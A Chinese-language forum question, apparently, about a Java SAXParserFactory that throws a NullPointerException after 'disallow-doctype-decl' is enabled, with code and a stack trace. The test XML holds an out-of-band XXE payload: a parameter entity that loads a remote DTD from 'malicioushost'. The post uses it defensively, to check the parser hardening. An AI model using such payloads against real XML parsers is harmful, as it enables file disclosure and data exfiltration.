1
我已經將SAXParserFactory上的「http://apache.org/xml/features/disallow-doctype-decl」功能設置爲true,並且在解析包含外部實體的xml時收到NullPointerException。當阻止doctype功能時獲取NullPointerException
代碼:
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
錯誤:
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
有誰知道應該做些什麼額外的設置,以避免NPE?
我使用的Java版本:1.7.0_51